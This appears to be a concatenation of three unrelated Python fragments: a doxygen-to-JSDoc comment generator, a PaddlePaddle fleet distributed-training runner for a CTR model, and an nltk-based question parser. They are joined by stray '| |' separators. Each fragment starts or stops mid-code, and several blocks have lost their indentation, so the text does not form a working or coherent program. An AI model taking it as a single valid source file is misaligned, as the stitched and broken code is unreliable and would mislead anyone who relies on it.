
    Returns:
        a (string, dict) pair. The string is the comments minus the param
        parts. The dict maps param names to their comments.
    """
    collecting_key = None  # param currently accumulating continuation lines
    param_comments = {}
    comments = []
    comment_lines = func.attributes['__docs'].splitlines()
    for line in comment_lines:
        match = _doxygen_tag_re.match(line)
        if match:
            if match.group(1) == 'param':
                match = _param_re.match(line)
                if match:
                    collecting_key = match.group(1)
                    param_comments[collecting_key] = match.group(2)
                else:
                    # BUG FIX: this branch previously referenced an undefined
                    # 'param_name' variable, raising NameError instead of
                    # reporting the error. Report the malformed line instead.
                    log.SourceError(func,
                                    ('Incorrect format for param '
                                     'comment "%s" on function "%s"') %
                                    (line, func.name))
            else:
                # Any other doxygen tag ends param-comment accumulation.
                comments += [line]
                collecting_key = None
        elif collecting_key:
            # Continuation line of the param comment being collected.
            param_comments[collecting_key] += '\n' + line
        else:
            comments += [line]
    return '\n'.join(comments), param_comments
def GetParamSpec(obj, param_name):
    """Gets the parameter specification string for a function parameter.

    Args:
        obj: The function.
        param_name: The name of the parameter.

    Returns:
        a string in JSDOC format for the parameter.
    """
    # Renamed local from 'type' to avoid shadowing the builtin.
    param_type = GetFunctionParamType(obj, param_name)
    return '@param {%s} %s ' % (param_type,
                                naming.Normalize(param_name, naming.Java))
def GetReturnSpec(obj, flags):
    """Gets the return type specification string for a function.

    Args:
        obj: The function.
        flags: A map of flags. The only one we care about is 'eat_lines',
            which we'll set to True when return docs are globally disabled
            and the function carries the 'noreturndocs' attribute.

    Returns:
        a string in JSDOC format for the return type, or '' when return
        docs are suppressed.
    """
    if gflags.FLAGS['no-return-docs'].value and 'noreturndocs' in obj.attributes:
        flags['eat_lines'] = True
        return ''
    # Renamed local from 'type' to avoid shadowing the builtin.
    if obj.type_defn:
        return_type = GetFullyQualifiedTypeName(obj.type_defn)
    else:
        return_type = "**unknown return type**"
    return '@return {%s}' % return_type
class JavascriptFileWriter(object):
"""Javascript file writer class.
This class helps with generating a Javascript file by parts, by allowing
delayed construction of 'sections' inside the code, that can be filled later.
For example one can create a section for forward declarations, and add code to
that section as the rest of the file gets written.
It also provides facility to add #include lines, and header guards for header
files, as well as simplifies namespace openning and closing.
It helps 'beautifying' the code in simple cases.
"""
class Section(object):
"""Javascript writer section class."""
# this regexp is used for EmitTemplate. It maps {#SomeText} into 'section'
# groups and the rest of the text into 'text' groups in the match objects.
_template_re = re.compile(
r"""
^\s* # skip whitespaces
(?: # non grouping ( )
\$\{\#(?P<section>[_A-Za-z0-9]*)\} # matches a '${#AnyText}' section
# tag, puts the 'AnyText' in a
# 'section' group
| # ... or ...
(?P<text>.*) # matches any text, puts it into
# a 'text' group
) # close non-grouping ( )
\s*$ # skip whitespaces
""", re.MULTILINE | re.VERBOSE)
def __init__(self, indent_string, indent):
"""Inits a JavascriptFileWriter.Section.
Args:
indent_string: the string for one indentation.
indent: the number of indentations for code inside the section.
"""
self._indent_string = indent_string
self._code = []
self._fe_namespaces = []
self._be_namespaces = []
self._section_map = {}
self._indent = indent
self._need_validate = False
def EmitSection(self, section):
"""Emits a section at the current position.
When calling GetLines, the code for the section passed in will be output
at this position.
Args:
section: the | |
#!/usr/bin/python
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
import os
import re
import commands
import logging
import time
import numpy as np
import paddle
import paddle.fluid as fluid
import paddle.fluid.incubate.fleet.base.role_maker as role_maker
from paddle.fluid.incubate.fleet.parameter_server.distribute_transpiler import fleet
from paddle.fluid.transpiler.distribute_transpiler import DistributeTranspilerConfig
import py_reader_generator as py_reader
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger("fluid")
logger.setLevel(logging.INFO)
class FleetDistRunnerBase(object):
"""
Distribute training base class:
This class abstracts the training process into several major steps:
1. input_data: input data of network, this function should be realized by user
2. net: network definition, this function should be defined by user
3. run_pserver: run pserver node in distribute environment
4. run_trainer: run trainer, choose the way of training network according to requirement params
5. run_infer: prediction based on the trained model
6. py_reader: using py_reader method get data, this function should be realized by user
7. dataset_reader: using dataset method get data, this function should be realized by user
8. runtime_main: program entry, get the environment parameters, decide which function to call
"""
def input_data(self, params):
    """
    Function input_data: Definition of the input data format of the network.

    Must be overridden by subclasses.

    Args:
        :params: the hyper parameters of network
    Returns:
        defined by users
    """
    message = "input_data should be implemented by child classes."
    raise NotImplementedError(message)
def net(self, inputs, params):
    """
    Function net: Definition of the network structure.

    Must be overridden by subclasses.

    Args:
        :inputs: input data, e.g. dataset and labels, as produced by
            self.input_data
        :params: the hyper parameters of network
    Returns:
        evaluation parameters, defined by users
    """
    message = "net should be implemented by child classes."
    raise NotImplementedError(message)
def run_pserver(self, params):
    """
    Function run_pserver: Operation method of the parameter server node.

    Builds the same network graph as the trainers (so the distributed
    transpiler can derive the server-side program), then blocks inside
    fleet.run_server().

    Args:
        :params: the hyper parameters of network
    Returns:
        None (fleet.run_server() blocks until the job terminates)
    """
    logger.info("run pserver")
    # Pin this process as SERVER number `current_id` in the cluster.
    role = role_maker.UserDefinedRoleMaker(
        current_id=params.current_id,
        role=role_maker.Role.SERVER,
        worker_num=params.trainers,
        server_endpoints=params.pserver_endpoints)
    fleet.init(role)
    place = fluid.CPUPlace()
    exe = fluid.Executor(place)  # NOTE(review): created but never used here
    reader = None
    inputs = self.input_data(params)
    feeds = []  # NOTE(review): unused; presumably leftover from a feed-based path
    if params.is_pyreader_train:
        # The pserver must construct the identical graph the trainers use,
        # including the py_reader input pipeline.
        reader = self.py_reader(params)
        inputs = fluid.layers.read_file(reader)
    elif not params.is_dataset_train:
        raise ValueError("Program must has Date feed method: is_pyreader_train / is_dataset_train")
    loss, auc_var, batch_auc_var, _ = self.net(inputs, params)
    optimizer = fluid.optimizer.Adam(params.learning_rate)
    # Wrapping the optimizer makes minimize() emit the distributed programs.
    optimizer = fleet.distributed_optimizer(optimizer, self.strategy)
    optimizer.minimize(loss)
    fleet.init_server()
    logger.info("PServer init success!")
    # Dump the transpiled programs for debugging.
    with open("pserver_train.proto",'w') as f:
        f.write(str(fleet.main_program))
    with open("pserver_startup.proto",'w') as f:
        f.write(str(fleet.startup_program))
    fleet.run_server()
def run_dataset_trainer(self, params):
    """
    Function run_dataset_trainer: Operation method of a training node using
    the dataset (train_from_dataset) input method.

    Args:
        :params: the hyper parameters of network
    Returns:
        :train_result: the dict of training log (time/memory per epoch)
    """
    logger.info("run trainer")
    # Pin this process as WORKER number `current_id` in the cluster.
    role = role_maker.UserDefinedRoleMaker(
        current_id=params.current_id,
        role=role_maker.Role.WORKER,
        worker_num=params.trainers,
        server_endpoints=params.pserver_endpoints)
    fleet.init(role)
    inputs = self.input_data(params)
    # For the model: ctr-dnn, we use loss,auc,batch_auc to measure the performance of network
    # Replace it with your network evaluation index,
    # Note: self.net must also return the input_data; it is reused in run_infer.
    loss, auc_var, batch_auc_var, _ = self.net(inputs, params)
    # define the optimizer for your model
    optimizer = fluid.optimizer.Adam(params.learning_rate)
    optimizer = fleet.distributed_optimizer(optimizer,self.strategy)
    optimizer.minimize(loss)
    logger.info("Program construction complete")
    exe = fluid.Executor(fluid.CPUPlace())
    fleet.init_worker()
    exe.run(fleet.startup_program)
    CPU_NUM = int(params.cpu_num)
    USE_CUDA = params.use_cuda  # NOTE(review): unused in the dataset path
    # Dump the transpiled programs for debugging.
    with open(str(params.current_id)+"_trainer_train.proto",'w') as f:
        f.write(str(fleet.main_program))
    with open(str(params.current_id)+"_trainer_startup.proto",'w') as f:
        f.write(str(fleet.startup_program))
    train_result = {}
    # Notice: Both dataset and py_reader method don't using feed={dict} to input data
    # Paddle Fluid enter data by variable name
    # When we do the definition of the reader, the program has established the workflow
    logger.info("run dataset train")
    dataset = self.dataset_reader(inputs, params)
    file_list = [str(params.train_files_path) + "/%s" % x
                 for x in os.listdir(params.train_files_path)]
    if params.is_local_cluster:
        # Each trainer only consumes its own shard of the training files.
        file_list = fleet.split_files(file_list)
    logger.info("file list: {}".format(file_list))
    print("file list: {}".format(file_list))
    print('------------------------------------')
    print('-----------%s trainer ready---------'%(params.current_id))
    print('------------------------------------')
    for epoch in range(params.epochs):
        dataset.set_filelist(file_list)
        if not params.is_local_cluster and params.barrier_level == 2:
            # Barrier: wait until every trainer reaches this epoch.
            print("add epoch barrier")
            self.check_all_trainers_ready(epoch)
        start_time = time.time()
        # Notice: function train_from_dataset does not return fetch value
        exe.train_from_dataset(program=fleet.main_program, dataset=dataset,
                               fetch_list=[auc_var], fetch_info=['auc'],
                               print_period=100, debug=False)
        end_time = time.time()
        self.record_time(epoch, train_result, end_time - start_time)
        self.record_memory(epoch, train_result)
        sys.stderr.write("epoch %d finished, use time=%d\n" % ((epoch), end_time - start_time))
        if params.is_first_trainer and params.test:
            # Only trainer 0 checkpoints the model for later inference.
            model_path = str(params.model_path) +'/trainer_'+ str(params.current_id) +'_epoch_'+ str(epoch)
            fleet.save_persistables(executor=exe, dirname=model_path)
            if not params.is_local_cluster:
                self.upload_files(model_path,params)
        if params.is_first_trainer:
            # Persist the per-epoch training log.
            train_method = '_dataset_train'
            log_path = str(params.log_path + '/' + str(params.current_id) + train_method + '_' + str(epoch) + '.log')
            with open(log_path, 'w+') as f:
                f.write(str(train_result))
            if not params.is_local_cluster:
                self.upload_files(log_path, params)
    logger.info("Train Success!")
    fleet.stop_worker()
    return train_result
def run_pyreader_trainer(self,params):
    """
    Function run_pyreader_trainer: Operation method of a training node using
    the py_reader input method (explicit exe.run loop with fetches).

    Args:
        :params: the hyper parameters of network
    Returns:
        :train_result: the dict of training log (time/memory/loss/auc per epoch)
    """
    logger.info("run trainer")
    # Pin this process as WORKER number `current_id` in the cluster.
    role = role_maker.UserDefinedRoleMaker(
        current_id=params.current_id,
        role=role_maker.Role.WORKER,
        worker_num=params.trainers,
        server_endpoints=params.pserver_endpoints)
    fleet.init(role)
    exe = fluid.Executor(fluid.CPUPlace())
    inputs = self.input_data(params)
    reader = self.py_reader(params)
    # Replace the placeholder inputs with variables read from the py_reader.
    inputs = fluid.layers.read_file(reader)
    # For the model: ctr-dnn, we use loss,auc,batch_auc to measure the performance of network
    # Replace it with your network evaluation index,
    # Note: self.net must also return the input_data; it is reused in run_infer.
    loss, auc_var, batch_auc_var, _ = self.net(inputs, params)
    # define the optimizer for your model
    optimizer = fluid.optimizer.Adam(params.learning_rate)
    optimizer = fleet.distributed_optimizer(optimizer, self.strategy)
    optimizer.minimize(loss)
    logger.info("Program construction complete")
    fleet.init_worker()
    exe.run(fleet.startup_program)
    CPU_NUM = int(params.cpu_num)
    USE_CUDA = params.use_cuda  # NOTE(review): unused in this path
    # Dump the transpiled programs for debugging.
    with open(str(params.current_id)+"_trainer_train.proto",'w') as f:
        f.write(str(fleet.main_program))
    with open(str(params.current_id)+"_trainer_startup.proto",'w') as f:
        f.write(str(fleet.startup_program))
    train_result = {}
    # Notice: Both dataset and py_reader method don't using feed={dict} to input data
    # Paddle Fluid enter data by variable name
    # When we do the definition of the reader, the program has established the workflow
    train_generator = py_reader.CriteoDataset(params.sparse_feature_dim)
    file_list = [str(params.train_files_path) + "/%s" % x
                 for x in os.listdir(params.train_files_path)]
    if params.is_local_cluster:
        # Each trainer only consumes its own shard of the training files.
        file_list = fleet.split_files(file_list)
    logger.info("file list: {}".format(file_list))
    print("file list: {}".format(file_list))
    train_reader = paddle.batch(
        paddle.reader.shuffle(
            train_generator.train(file_list, params.trainers, params.current_id),
            buf_size=params.batch_size * 100
        ), batch_size=params.batch_size)
    reader.decorate_paddle_reader(train_reader)
    exec_strategy = fluid.ExecutionStrategy()
    exec_strategy.num_threads = int(params.cpu_num)
    build_strategy = fluid.BuildStrategy()
    build_strategy.async_mode = params.async_mode
    if params.async_mode:
        # Memory optimization is incompatible with async execution here.
        build_strategy.memory_optimize = False
    if CPU_NUM > 1:
        build_strategy.reduce_strategy = fluid.BuildStrategy.ReduceStrategy.Reduce
    compiled_prog = fluid.compiler.CompiledProgram(
        fleet.main_program).with_data_parallel(
        loss_name=loss.name, build_strategy=build_strategy, exec_strategy=exec_strategy)
    print('------------------------------------')
    print('-----------%s trainer ready---------'%(params.current_id))
    print('------------------------------------')
    for epoch in range(params.epochs):
        reader.start()
        if not params.is_local_cluster and params.barrier_level == 2:
            # Barrier: wait until every trainer reaches this epoch.
            print("add epoch barrier")
            self.check_all_trainers_ready(epoch)
        start_time = time.time()
        epoch_loss = 0.0
        batch_id = 0
        try:
            # py_reader signals end-of-epoch by raising EOFException.
            while True:
                loss_val, auc_val, batch_auc_val = exe.run(program=compiled_prog,
                                                           fetch_list=[loss.name, auc_var.name,
                                                                       batch_auc_var.name])
                loss_val = np.mean(loss_val)
                epoch_loss += loss_val
                if batch_id % 100 == 0:
                    print("TRAIN --> pass: {} batch: {} loss: {} auc: {}, batch_auc: {}, queue_size: {}"
                          .format(epoch, batch_id, loss_val, auc_val, batch_auc_val, reader.queue.size()))
                    logger.info("TRAIN --> pass: {} batch: {} loss: {} auc: {}, batch_auc: {}, queue_size: {}"
                                .format(epoch, batch_id, loss_val, auc_val, batch_auc_val, reader.queue.size()))
                batch_id += 1
        except fluid.core.EOFException:
            reader.reset()
        end_time = time.time()
        if params.test and params.is_first_trainer:
            # Only trainer 0 checkpoints the model for later inference.
            model_path = str(params.model_path) +'/trainer_'+ str(params.current_id) +'_epoch_'+ str(epoch)
            fleet.save_persistables(executor=exe, dirname=model_path)
            if not params.is_local_cluster:
                self.upload_files(model_path,params)
        train_result = self.record_time(epoch, train_result, end_time - start_time)
        train_result = self.record_memory(epoch, train_result)
        train_result[epoch]['loss'] = epoch_loss / float(batch_id)
        train_result[epoch]['auc'] = auc_val[0]
        sys.stderr.write("epoch %d finished, use time=%d, loss=%f, auc=%f\n"
                         % ((epoch + 1), end_time - start_time, train_result[epoch]['loss'], train_result[epoch]['auc']))
        if params.is_first_trainer:
            # Persist the per-epoch training log.
            train_method = '_pyreader_train'
            log_path = str(params.log_path + '/' + str(params.current_id) + train_method + '_' + str(epoch) + '.log')
            with open(log_path, 'w+') as f:
                f.write(str(train_result))
            if not params.is_local_cluster:
                self.upload_files(log_path,params)
    logger.info("Train Success!")
    fleet.stop_worker()
    return train_result
def check_model_format(self, epoch_id):
    """Return True if `epoch_id` matches the saved-model directory naming
    scheme 'trainer_<id>_epoch_<n>' (case-insensitive).

    Args:
        :epoch_id: directory name string to validate
    Returns:
        bool
    """
    # Raw string for the regex; bool(...) replaces the verbose if/else.
    # re.M|re.I kept for backward-compatible matching behavior.
    pattern = r'^trainer_[0-9]+_epoch_[0-9]+$'
    return bool(re.match(pattern, epoch_id, re.M | re.I))
def run_local_pyreader(self, params):
place = fluid.CPUPlace()
inputs = self.input_data(params)
#reader = self.py_reader(params)
#inputs = fluid.layers.read_file(reader)
dataset = py_reader.CriteoDataset(params.sparse_feature_dim)
file_list = [str(params.train_files_path) + "/%s" % x
for x in os.listdir(params.train_files_path)]
logger.info("file list: {}".format(file_list))
print("file list: {}".format(file_list))
train_reader = paddle.batch(
dataset.train(file_list, 1, 0), batch_size=params.batch_size)
startup_program = fluid.default_startup_program()
main_program = fluid.default_main_program()
train_result = {}
loss, auc_var, batch_auc_var, data_list = self.net(inputs, params)
optimizer = fluid.optimizer.SGD(params.learning_rate)
optimizer.minimize(loss)
exe = fluid.Executor(place)
exe.run(startup_program)
feeder = fluid.DataFeeder(feed_list=data_list, place=place)
CPU_NUM = params.cpu_num
exec_strategy = fluid.ExecutionStrategy()
exec_strategy.num_threads = CPU_NUM
build_strategy = fluid.BuildStrategy()
if CPU_NUM > 1:
build_strategy.reduce_strategy = fluid.BuildStrategy.ReduceStrategy.Reduce
pe = fluid.ParallelExecutor(
use_cuda=False,
loss_name=loss.name,
main_program=main_program,
build_strategy=build_strategy,
exec_strategy=exec_strategy,
scope=fluid.global_scope())
train_result = {}
logger.info("--------begin------- ")
for epoch in range(params.epochs):
start_time = time.time()
epoch_loss = 0.0
for batch_id, data in | |
print('\t\tJJS : ', tree)
_JJS = tree.leaves()[0][0]
self.condition_object['JJS'] = tree.leaves()[0][0]
for tree in result.subtrees(filter=lambda x: x.label() == 'Target'):
# print('\t\tTarget : ', tree)
_Target = tree.leaves()[0][0]
self.condition_object['condition_target'] = _Target
phrase_to_be_filtered = _JJS + ' ' + _Target
self.condition_filter_stop_words.append(phrase_to_be_filtered)
# print('\t\t', tree_leaves)
def condition_component_scraper(self, tree_leaves):
    """Extract the components of a numeric condition phrase.

    Chunks the tagged leaves into comparatives (JJR), numbers (CD) and
    nouns (NP), records them on self.condition_object, and adds the
    matched "<number> <unit>" phrase to the condition stop-word filter.

    Args:
        tree_leaves: tagged (word, POS) leaves of the condition subtree.
    """
    # The to do list here: 1. replace all number words with digits
    grammar = '''JJR: {<JJR>}
CD: {<CD>+<NN|NNS|NNP*>+|<CD>+}
NP: {<NNS|NN|NNP>}
'''
    cp = nltk.RegexpParser(grammar)
    result = cp.parse(tree_leaves)
    # result.draw()
    JJR = ([word for word, pos in result.pos() if pos == 'JJR'])
    # Within the CD tree, collect all cascading numbers and multiply them
    # together (e.g. "two hundred" -> 2 * 100).
    CDs = ([word for word, pos in result.pos() if pos == 'CD'])
    NPs = ([word for word, pos in result.pos() if pos == 'NP'])
    self.condition_object['Types'].append('value')
    self.condition_object['JJR'] = JJR
    self.condition_object['NP'] = NPs
    value = 1
    original_value = ''
    there_is_value = False
    unit_target = ['']
    # NOTE: each cd_word here is itself a (token, POS) pair from result.pos().
    for cd_index, cd_word in enumerate(CDs):
        if cd_word[1] == 'CD':
            there_is_value = True
            if cd_index == 0:
                # Remember the literal first number for the stop-word phrase.
                original_value = cd_word[0]
            value *= float(cd_word[0])
        elif cd_word[1] == 'NNS':
            # A plural noun inside the CD chunk is taken as the unit/target.
            unit_target = cd_word
            self.condition_object['condition_target'] = cd_word
    if there_is_value:
        self.condition_object['value'] = value
    phrase_to_filter = original_value + ' ' + unit_target[0]
    self.condition_filter_stop_words.append(phrase_to_filter.lower())
def replace_word_with_digits(self, sentence):
    """Replace every number word in the sentence with its digit form.

    Tokens that word_to_num cannot parse are kept unchanged.

    Args:
        sentence: input sentence string.
    Returns:
        the sentence with number words converted, space-joined.
    """
    converted = []
    for token in sentence.split(' '):
        try:
            converted.append(str(w2n.word_to_num(token)))
        except ValueError:
            # Not a number word -- keep the original token.
            converted.append(token)
    return ' '.join(converted)
def function_indicator_filter(self, tagged_sentence, sentence):
    """Detect and strip imperative/question indicator phrases.

    1. Flags general questions whose first token is a general-question
       key word ("did", "does", ...).
    2. Chunks out SMA phrases ("Show me all", "Give me all", "List ...")
       and WHJ (wh-question) phrases; SMA phrases are removed from the
       sentence, WHJ phrases are scraped for predicates/target classes.

    Args:
        tagged_sentence: POS-tagged (word, tag) pairs for the sentence.
        sentence: the raw sentence string.
    Returns:
        the sentence with the SMA phrase removed when one is found,
        otherwise None (implicit).
    """
    if tagged_sentence:
        first_word_in_sentence = tagged_sentence[0][0].lower().strip()
        if first_word_in_sentence in self.general_question_key_words:
            print('\t\t------------ GQ -------------')
            print('\t\tIdentified a general question')
            self.general_question = True
            print('\t\t-----------------------------')
    # "list" sentences need a slightly different chunk grammar.
    if 'list' in sentence.lower():
        grammar = '''
SMA:
}<VB>+<IN>+{
{<VB><PRP><PDT>*<DT>*<NN>*<IN>*<DT>*}
}<JJ><NN>*{
WHJ:{<IN>*<WP|WRB|JJ|WDT><RB|JJ>*<NN|NNS>*<VBP|VBD|VBZ|VB>*<DT>*}
'''
    else:
        grammar = '''
SMA:
}<VB>+<IN>+{
{<VB><PRP><PDT>*<DT>*}
WHJ:{<IN>*<WP|WRB|JJ|WDT><RB|JJ>*<NN|NNS|NNP>*<VBP|VBD|VBZ|VB>*<DT>*}
'''
    cp = nltk.RegexpParser(grammar)
    result = cp.parse(tagged_sentence)
    # result.draw()
    for tree in result:
        if type(tree) == nltk.Tree:
            if tree.label() == 'SMA' and len(tree.leaves()) > 1:
                # Remove the imperative phrase and keep the remainder as
                # the question target.
                joined_phrase = self.join_tree_into_phrases(tree.leaves(), False)
                print('--------------------------------------------------------')
                print('Inside SMA: new sentence |', sentence.replace(joined_phrase, ''), ' |')
                self.SMA_Object['Target'] = sentence.replace(joined_phrase, '')
                self.SMA_Object['SMA'] = True
                print('--------------------------------------------------------')
                return sentence.replace(joined_phrase, '')
            elif tree.label() == 'WHJ' and len(tree.leaves()) > 1:
                # Skip bare "JJ NN(S)" pairs -- those are not wh-questions.
                if not ((tree.leaves()[0][1] == 'JJ') and ((tree.leaves()[1][1] == 'NN') or (
                        tree.leaves()[1][1] == 'NNS')) and (len(tree.leaves()) == 2)):
                    self.scrape_out_predicates_and_target_classes_out_of_whj(tree.leaves())
                    self.filter_out_tokens(tree.leaves())
def scrape_out_predicates_and_target_classes_out_of_whj(self, tree_leaves):
    """Scrape predicates, target classes and conditions out of a WHJ phrase.

    Chunks the wh-question leaves and, per chunk label, updates the parser
    state (self.general_condition, self.target_class, self.hmq_object,
    self.expected_class) and the stop-word filter.

    Args:
        tree_leaves: tagged (word, POS) leaves of the WHJ subtree.
    """
    scrape_grammar = '''
target_class:
{<NN|NNP|NNS>+}
general_question:
{<WP|WRB><VBD>*<JJ>*}
class_question:
{<WDT>}
condition:
{<JJ>}
predicate:
{<VBD|VBZ|VBP>}
'''
    cp = nltk.RegexpParser(scrape_grammar)
    result = cp.parse(tree_leaves)
    # NOTE(review): `stop` is built but never used in this method.
    stop = set(stopwords.words('english'))
    stop.update(['did', 'do', 'does', 'which'])
    # result.draw()
    for tree in result:
        if type(tree) == nltk.Tree:
            if tree.label() == 'predicate':
                # Predicates are currently only traced, not recorded.
                print()
            elif tree.label() == 'condition':
                self.general_condition = tree_leaves
                self.filter_out_tokens(tree.leaves())
            elif tree.label() == 'target_class':
                self.target_class = tree.leaves()
                self.filter_out_tokens(tree.leaves())
                self.question_type_recogizer(tree_leaves)
            elif tree.label() == 'class_question':
                self.filter_out_tokens(tree.leaves())
                self.question_type_recogizer(tree_leaves)
            elif tree.label() == 'general_question':
                self.identify_hm_question(tree.leaves())
                self.question_type_recogizer(tree_leaves)
                self.filter_out_tokens(tree.leaves())
    # TODO: identify what answer does it expect
def identify_hm_question(self, tree_leaves):
    """Detect "how many" / "how <adjective>" questions.

    Records the detection on self.hmq_object; leaves it untouched when
    the leaves match neither pattern.

    Args:
        tree_leaves: tagged (word, POS) leaves of the question chunk.
    """
    words = [leaf[0].strip().lower() for leaf in tree_leaves]
    tags = [leaf[1].strip() for leaf in tree_leaves]
    joined_words = ''.join(words).strip()
    joined_tags = ''.join(tags).strip()
    if joined_words == 'howmany':
        self.hmq_object = {'type': 'howmany', 'HM': True}
    elif joined_tags == 'WRBJJ':
        # "how <adjective>" question -- remember the adjective.
        self.hmq_object = {'type': 'howjj', 'HM': True, 'JJ': words[1]}
def question_type_recogizer(self, tree_leaves):
    """Infer the expected answer class from the wh-word in the leaves.

    Sets self.expected_class to 'Date', 'Person', 'Place' or 'Thing'
    depending on which wh-word appears (last match wins); leaves it
    unchanged when no wh-word is present.

    Args:
        tree_leaves: tagged (word, POS) leaves of the question chunk.
    """
    # Dispatch table instead of the original if/elif chain.
    expected_by_word = {
        'when': 'Date',
        'who': 'Person',
        'whom': 'Person',
        'where': 'Place',
        'what': 'Thing',
    }
    for leaf in tree_leaves:
        token = leaf[0].strip().lower()
        if token in expected_by_word:
            self.expected_class = expected_by_word[token]
def filter_out_tokens(self, leaves):
    """Add each leaf's token (lower-cased, stripped) to self.stop_words.

    Args:
        leaves: tagged (word, POS) leaves whose words should be filtered
            from later processing.
    """
    self.stop_words.extend(leaf[0].lower().strip() for leaf in leaves)
def clean_a_list(self, _list):
    """Deduplicate and stop-word-filter a mixed list of phrases.

    Items may be strings, lists of (word, POS) tuples (joined into a
    phrase), or other lists (passed through unchanged). Strings are
    deduplicated and filtered against NLTK stop words plus a few extras;
    finally every collected phrase is scrubbed of self.stop_words tokens.

    Args:
        _list: mixed list of strings / tagged-tuple lists.
    Returns:
        the cleaned list of phrases (plus pass-through items).
    """
    stop = set(stopwords.words('english'))
    stop.update(['did', 'do', 'does', 'which', 'that', 'place'])
    new_list = []
    new_list_2 = []
    for item in _list:
        if type(item) == type(_list):
            # this is a list of tuples
            if item[0]:
                if type(item[0]) == type(('a', 'b')):
                    a_phrase = (self.join_tree_into_phrases(item, True))
                    if (a_phrase not in new_list) and len(item) > 0:
                        new_list.append(a_phrase)
                else:
                    # A nested list that is not tagged tuples: keep as-is.
                    new_list_2.append(item)
        elif type(item) == str:
            if (item not in new_list) and (item.strip().lower() not in stop) and len(item) > 0:
                new_list.append(item)
    # Second pass: drop any token that is in the instance stop-word list.
    for phrase in new_list:
        array = phrase.split(' ')
        temp = []
        for word in array:
            if word.strip().lower() not in self.stop_words:
                temp.append(word.strip())
        new_phrase = ' '.join(temp)
        new_list_2.append(new_phrase.strip())
    return new_list_2
def join_triple_of_triple(self):
    """Placeholder: always returns the empty string (not yet implemented)."""
    return ''
def make_map_of_tokens(self, _tokens):
    """Build a token -> position map for a token sequence.

    Duplicate tokens keep the index of their LAST occurrence (same as the
    original loop-based behavior).

    Args:
        _tokens: iterable of tokens.
    Returns:
        dict mapping each token to its (last) index.
    """
    # Dict comprehension; the original used a local named 'map', which
    # shadowed the builtin.
    return {token: index for index, token in enumerate(_tokens)}
def remove_redundant_in_triple_from_condition_filter(self):
    """Drop or rewrite triple elements already captured by the condition filter.

    For each triple in self.list_of_NIN_pairs:
      * removes the whole triple when its middle element is a comparative
        filler ("more"/"less"/jjr stop word);
      * replaces any element that equals a condition stop-word phrase with
        a {'text', 'condition_object'} dict carrying the parsed condition.
    """
    # NOTE(review): this removes items from self.list_of_NIN_pairs while
    # enumerating it, which skips the element following each removal --
    # confirm whether that is intended before relying on it.
    for triple_index, triple in enumerate(self.list_of_NIN_pairs):
        raw_triple = triple
        triple = triple['triple']
        for element_index, triple_element in enumerate(triple):
            # if triple_element is a tuple, else it is a string
            if type(triple_element) == type(('a', 'b')):
                print('')
            elif type(triple_element) != type([]):
                if element_index == 1 and (
                        triple_element.strip().lower() == 'more' or triple_element.strip().lower() == 'less' or triple_element.strip().lower() in self.jjr_stop_words):
                    # Middle element is just a comparative word: drop triple.
                    self.list_of_NIN_pairs.remove(raw_triple)
                else:
                    for stop_word in self.condition_filter_stop_words:
                        if triple_element.strip().lower() == stop_word.strip().lower():
                            # This element IS the condition phrase; embed the
                            # parsed condition object in its place.
                            JJS_word = self.condition_object['JJS'].strip()
                            triple_object = {'text': triple_element.replace(JJS_word, '').strip(),
                                             'condition_object': self.condition_object}
                            _triple = self.list_of_NIN_pairs[triple_index]['triple']
                            _triple_list = list(_triple)
                            _triple_list[element_index] = triple_object
                            self.list_of_NIN_pairs[triple_index]['triple'] = tuple(_triple_list)
    # TODO: now delay this process
def join_cascading_predicates(self):
    """Merge predicates that are adjacent in the original sentence.

    Pass 1: a candidate predicate adjacent (by sentence position) to a
    predicate stored inside a subject element is merged into that subject's
    predicate and removed from the candidate list.
    Pass 2: two adjacent candidate predicates are merged into a single
    two-word phrase, ordered by sentence position.
    """
    # NOTE(review): both passes call list.remove() on the list being
    # iterated; with multiple adjacent predicates this can skip elements or
    # raise ValueError on a second removal of the same word -- confirm.
    for predicate_word in self.list_of_predicates_candidate:
        predicate_word_index = self.find_index_of_word(predicate_word)
        # iterate through triples and find those having predicates, check for cascading predicates
        for list_index, subject_element_list in enumerate(self.list_of_subjects_candidate):
            if type(subject_element_list) == type([]):
                for element_index, subject_element in enumerate(subject_element_list):
                    if type(subject_element) != type('x'):
                        if subject_element['predicate']:
                            predicate_in_subject_index = self.find_index_of_word(subject_element['predicate'])
                            if abs(predicate_word_index - predicate_in_subject_index) == 1:
                                # Adjacent in the sentence: join in order.
                                if predicate_word_index > predicate_in_subject_index:
                                    new_predicate = subject_element['predicate'] + ' ' + predicate_word
                                    print('new predicate', new_predicate)
                                else:
                                    new_predicate = predicate_word + ' ' + subject_element['predicate']
                                    print('new predicate', new_predicate)
                                # remove word from predicate, update the one in subjects
                                subject_element['predicate'] = new_predicate
                                self.list_of_predicates_candidate.remove(predicate_word)
    for predicate_word_1 in self.list_of_predicates_candidate:
        for predicate_word_2 in self.list_of_predicates_candidate:
            index_1 = self.find_index_of_word(predicate_word_1)
            index_2 = self.find_index_of_word(predicate_word_2)
            if abs(index_1 - index_2) == 1:
                # Adjacent candidates: keep them as an ordered pair.
                if index_1 > index_2:
                    _new_phrase = [predicate_word_2, predicate_word_1]
                else:
                    _new_phrase = [predicate_word_1, predicate_word_2]
                self.list_of_predicates_candidate.remove(predicate_word_1)
                self.list_of_predicates_candidate.remove(predicate_word_2)
                self.list_of_predicates_candidate.append(_new_phrase)
def find_index_of_word(self, word):
    """Return the 0-based position of `word` in the original sentence.

    The needle is stripped/lower-cased; sentence tokens are compared as-is
    (split on single spaces). Returns the sentinel -9 when not found.

    Args:
        word: the word to look up.
    Returns:
        int index into the space-split sentence, or -9.
    """
    needle = word.strip().lower()
    for position, token in enumerate(self.original_sentence.split(' ')):
        if token == needle:
            return position
    return -9
def remove_general_question_indicator_from_sentence(self, tokens):
    """Drop tokens that are general-question key words.

    Args:
        tokens: list of token strings.
    Returns:
        a new list without the tokens found (stripped, lower-cased) in
        self.general_question_key_words.
    """
    keywords = self.general_question_key_words
